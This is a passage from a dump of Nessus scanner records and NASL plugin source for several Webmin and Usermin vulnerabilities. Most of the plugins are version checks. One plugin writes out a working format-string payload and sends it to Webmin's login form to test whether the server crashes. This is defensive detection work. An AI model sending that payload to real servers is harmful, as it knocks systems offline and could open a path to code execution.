potentially execute\n arbitrary code.\n\nStable updates are available for alpha, amd64, arm, hppa, i386, ia64,\nm68k, mips, mipsel, powerpc, s390 and sparc.", "edition": 25, "published": "2006-10-25T00:00:00", "title": "Debian DSA-1199-1 : webmin - multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3392", "CVE-2005-3912", "CVE-2006-4542"], "modified": "2006-10-25T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:3.1", "p-cpe:/a:debian:debian_linux:webmin"], "id": "DEBIAN_DSA-1199.NASL", "href": "https://www.tenable.com/plugins/nessus/22908", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1199. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(22908);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2005-3912\", \"CVE-2006-3392\", \"CVE-2006-4542\");\n script_bugtraq_id(15629, 18744, 19820);\n script_xref(name:\"DSA\", value:\"1199\");\n\n script_name(english:\"Debian DSA-1199-1 : webmin - multiple vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been identified in webmin, a web-based\nadministration toolkit. The Common Vulnerabilities and Exposures\nproject identifies the following vulnerabilities :\n\n - CVE-2005-3912\n A format string vulnerability in miniserv.pl could allow\n an attacker to cause a denial of service by crashing the\n application or exhausting system resources, and could\n potentially allow arbitrary code execution.\n\n - CVE-2006-3392\n Improper input sanitization in miniserv.pl could allow\n an attacker to read arbitrary files on the webmin host\n by providing a specially crafted URL path to the\n miniserv http server.\n\n - CVE-2006-4542\n Improper handling of null characters in URLs in\n miniserv.pl could allow an attacker to conduct\n cross-site scripting attacks, read CGI program source\n code, list local directories, and potentially execute\n arbitrary code.\n\nStable updates are available for alpha, amd64, arm, hppa, i386, ia64,\nm68k, mips, mipsel, powerpc, s390 and sparc.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=341394\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=381537\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=391284\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2005-3912\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-3392\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-4542\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2006/dsa-1199\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the webmin (1.180-3sarge1) package.\n\nFor the stable distribution (sarge), these problems have been fixed in\nversion 1.180-3sarge1.\n\nWebmin is not included in unstable (sid) or testing (etch), so these\nproblems are not present.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:webmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/10/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/10/25\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/11/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.1\", prefix:\"webmin\", reference:\"1.180-3sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"webmin-core\", reference:\"1.180-3sarge1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:52:00", "description": "The remote host is affected by the vulnerability described in GLSA-200512-02\n(Webmin, Usermin: Format string vulnerability)\n\n Jack Louis discovered that the Webmin and Usermin 'miniserv.pl'\n web server component is vulnerable to a Perl format string\n vulnerability. Login with the supplied username is logged via the Perl\n 'syslog' facility in an unsafe manner.\n \nImpact :\n\n A remote attacker can trigger this vulnerability via a specially\n crafted username containing format string data. This can be exploited\n to consume a large amount of CPU and memory resources on a vulnerable\n system, and possibly to execute arbitrary code of the attacker's choice\n with the permissions of the user running Webmin.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 25, "published": "2005-12-08T00:00:00", "title": "GLSA-200512-02 : Webmin, Usermin: Format string vulnerability", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3912"], "modified": "2005-12-08T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:usermin", "p-cpe:/a:gentoo:linux:webmin"], "id": "GENTOO_GLSA-200512-02.NASL", "href": "https://www.tenable.com/plugins/nessus/20281", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200512-02.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(20281);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2005-3912\");\n script_xref(name:\"GLSA\", value:\"200512-02\");\n\n script_name(english:\"GLSA-200512-02 : Webmin, Usermin: Format string vulnerability\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200512-02\n(Webmin, Usermin: Format string vulnerability)\n\n Jack Louis discovered that the Webmin and Usermin 'miniserv.pl'\n web server component is vulnerable to a Perl format string\n vulnerability. Login with the supplied username is logged via the Perl\n 'syslog' facility in an unsafe manner.\n \nImpact :\n\n A remote attacker can trigger this vulnerability via a specially\n crafted username containing format string data. This can be exploited\n to consume a large amount of CPU and memory resources on a vulnerable\n system, and possibly to execute arbitrary code of the attacker's choice\n with the permissions of the user running Webmin.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n # http://www.dyadsecurity.com/webmin-0001.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e5db4928\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200512-02\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Webmin users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-admin/webmin-1.250'\n All Usermin users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-admin/usermin-1.180'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:usermin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:webmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/12/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/12/08\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/11/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"app-admin/usermin\", unaffected:make_list(\"ge 1.180\"), vulnerable:make_list(\"lt 1.180\"))) flag++;\nif (qpkg_check(package:\"app-admin/webmin\", unaffected:make_list(\"ge 1.250\"), vulnerable:make_list(\"lt 1.250\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Webmin / Usermin\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T11:51:30", "description": "Jack Louis discovered a format string vulnerability in miniserv.pl\nPerl web server in Webmin before 1.250 and Usermin before 1.180, with\nsyslog logging enabled. This can allow remote attackers to cause a\ndenial of service (crash or memory consumption) and possibly execute\narbitrary code via format string specifiers in the username parameter\nto the login form, which is ultimately used in a syslog call.", "edition": 24, "published": "2006-01-15T00:00:00", "title": "Mandrake Linux Security Advisory : webmin (MDKSA-2005:223)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3912"], "modified": "2006-01-15T00:00:00", "cpe": ["cpe:/o:mandrakesoft:mandrake_linux:10.1", "cpe:/o:mandriva:linux:2006", "x-cpe:/o:mandrakesoft:mandrake_linux:le2005", "p-cpe:/a:mandriva:linux:webmin"], "id": "MANDRAKE_MDKSA-2005-223.NASL", "href": "https://www.tenable.com/plugins/nessus/20454", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2005:223. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(20454);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2005-3912\");\n script_xref(name:\"MDKSA\", value:\"2005:223\");\n\n script_name(english:\"Mandrake Linux Security Advisory : webmin (MDKSA-2005:223)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Mandrake Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Jack Louis discovered a format string vulnerability in miniserv.pl\nPerl web server in Webmin before 1.250 and Usermin before 1.180, with\nsyslog logging enabled. This can allow remote attackers to cause a\ndenial of service (crash or memory consumption) and possibly execute\narbitrary code via format string specifiers in the username parameter\nto the login form, which is ultimately used in a syslog call.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected webmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:webmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:10.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2006\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:mandrakesoft:mandrake_linux:le2005\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/12/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/01/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK10.1\", reference:\"webmin-1.150-3.2.101mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", cpu:\"x86_64\", reference:\"webmin-1.150-3.2.101mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK10.2\", reference:\"webmin-1.180-1.2.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", cpu:\"x86_64\", reference:\"webmin-1.180-1.2.102mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK2006.0\", reference:\"webmin-1.220-9.2.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", cpu:\"x86_64\", reference:\"webmin-1.220-9.2.20060mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T07:00:29", "description": "According to its self-reported version, the Webmin install hosted on\nthe remote host is prior to 1.250. It is, therefore, affected by \na remote code execution vulnerability if syslog logging is enabled.", "edition": 24, "cvss3": {"score": 7.3, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"}, "published": "2018-03-22T00:00:00", "title": "Webmin < 1.250 miniserv.pl Remote Code Execution", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3912"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:webmin:webmin"], "id": "WEBMIN_1_250.NASL", "href": "https://www.tenable.com/plugins/nessus/108549", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108549);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/11/08\");\n\n script_cve_id(\"CVE-2005-3912\");\n script_bugtraq_id(15629);\n\n script_name(english:\"Webmin < 1.250 miniserv.pl Remote Code Execution\");\n script_summary(english:\"Checks version of Webmin.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by a remote code execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the Webmin install hosted on\nthe remote host is prior to 1.250. It is, therefore, affected by \na remote code execution vulnerability if syslog logging is enabled.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/bid/15629\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.webmin.com/changes.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Webmin 1.250 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/11/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/22\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:webmin:webmin\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"webmin.nasl\");\n script_require_keys(\"www/webmin\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 10000);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\napp = 'Webmin';\nport = get_http_port(default:10000, embedded: TRUE);\n\nget_kb_item_or_exit('www/'+port+'/webmin');\nversion = get_kb_item_or_exit('www/webmin/'+port+'/version', exit_code:1);\nsource = get_kb_item_or_exit('www/webmin/'+port+'/source', exit_code:1);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\ndir = \"/\";\ninstall_url = build_url(port:port, qs:dir);\n\nfix = \"1.250\";\n\nif (ver_compare(ver:version, fix:fix, strict:FALSE) < 0)\n{\n report =\n '\\n URL : ' + install_url +\n '\\n Version Source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix + '\\n';\n\n security_report_v4(severity:SECURITY_HOLE, port:port, extra:report);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, version);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T15:48:30", "description": "The version of Webmin installed on the remote host contains a format\nstring flaw when logging failed authentication attempts. Using\nspecially crafted values for the 'username' parameter of the\n'session_login.cgi', an attacker could exploit the flaw to crash the\naffected server or to potentially execute arbitrary code on the\naffected host under the privileges of the userid in which the Perl\nscript 'miniserv.pl' runs. The default is the root user.", "edition": 26, "published": "2005-12-26T00:00:00", "title": "Webmin 'miniserv.pl' 'username' Parameter Format String", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3912"], "modified": "2005-12-26T00:00:00", "cpe": ["cpe:/a:webmin:webmin"], "id": "WEBMIN_MINISERV_USERNAME_FORMAT_STRING.NASL", "href": "https://www.tenable.com/plugins/nessus/20343", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(20343);\n script_version(\"1.27\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2005-3912\");\n script_bugtraq_id(15629);\n\n script_name(english:\"Webmin 'miniserv.pl' 'username' Parameter Format String\");\n script_summary(english:\"Checks for username parameter format string vulnerability in Webmin miniserv.pl.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote web server is affected by a format string vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Webmin installed on the remote host contains a format\nstring flaw when logging failed authentication attempts. Using\nspecially crafted values for the 'username' parameter of the\n'session_login.cgi', an attacker could exploit the flaw to crash the\naffected server or to potentially execute arbitrary code on the\naffected host under the privileges of the userid in which the Perl\nscript 'miniserv.pl' runs. The default is the root user.\");\n # http://web.archive.org/web/20070223132112/http://www.dyadsecurity.com/webmin-0001.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ba687296\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/archive/1/418093/100/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.webmin.com/security.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Webmin version 1.250 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/11/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/12/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:webmin:webmin\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_DENIAL);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n\n script_dependencies(\"webmin.nasl\");\n script_require_keys(\"www/webmin\");\n script_require_ports(\"Services/www\", 10000);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\napp = 'Webmin';\nport = get_http_port(default:10000, embedded: TRUE);\nget_kb_item_or_exit('www/'+port+'/webmin');\n\ndir = \"/\";\ninstall_url = build_url(port:port, qs:dir);\n\ndisable_cookiejar();\n\n# Try to exploit the flaw.\nexploit = \"%250\" + crap(data:\"9\", length:20) + \"d\";\npostdata =\n \"page=/&\" +\n \"user=\" + exploit + \"&\" +\n \"pass=\" + SCRIPT_NAME;\n\nr = http_send_recv3(\n port : port,\n method : \"POST\",\n item : \"/session_login.cgi\",\n version : 11,\n add_headers : make_array(\"Content-Type\", \"application/x-www-form-urlencoded\",\n \t \t\t \"Cookie2\", 'version=\"1\"',\n\t\t\t \"Cookie\", \"testing=1\" ),\n data : postdata\n);\n\n# There's a problem if MiniServ appears down.\nif (isnull(r))\n{\n if (http_is_dead(port:port, retry: 3))\n {\n if (report_verbosity > 0)\n {\n report =\n '\\n' + 'Nessus was able to exploit this issue with the following request : '+\n '\\n' + \n '\\n' + http_last_sent_request() + \n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n }\n}\naudit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:52:07", "description": "The remote host is affected by the vulnerability described in GLSA-200608-11\n(Webmin, Usermin: File Disclosure)\n\n A vulnerability in both Webmin and Usermin has been discovered by Kenny\n Chen, wherein simplify_path is called before the HTML is decoded.\n \nImpact :\n\n A non-authenticated user can read any file on the server using a\n specially crafted URL.\n \nWorkaround :\n\n For a temporary workaround, IP Access Control can be setup on Webmin\n and Usermin.", "edition": 24, "published": "2006-08-07T00:00:00", "title": "GLSA-200608-11 : Webmin, Usermin: File Disclosure", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3392"], "modified": "2006-08-07T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:usermin", "p-cpe:/a:gentoo:linux:webmin"], "id": "GENTOO_GLSA-200608-11.NASL", "href": "https://www.tenable.com/plugins/nessus/22169", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200608-11.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(22169);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2006-3392\");\n script_xref(name:\"GLSA\", value:\"200608-11\");\n\n script_name(english:\"GLSA-200608-11 : Webmin, Usermin: File Disclosure\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200608-11\n(Webmin, Usermin: File Disclosure)\n\n A vulnerability in both Webmin and Usermin has been discovered by Kenny\n Chen, wherein simplify_path is called before the HTML is decoded.\n \nImpact :\n\n A non-authenticated user can read any file on the server using a\n specially crafted URL.\n \nWorkaround :\n\n For a temporary workaround, IP Access Control can be setup on Webmin\n and Usermin.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200608-11\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Webmin users should update to the latest stable version:\n # emerge --sync\n # emerge --ask --verbose --oneshot '>=app-admin/webmin-1.290'\n All Usermin users should update to the latest stable version:\n # emerge --sync\n # emerge --ask --verbose --oneshot '>=app-admin/usermin-1.220'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:usermin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:webmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/08/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/08/07\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/06/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n 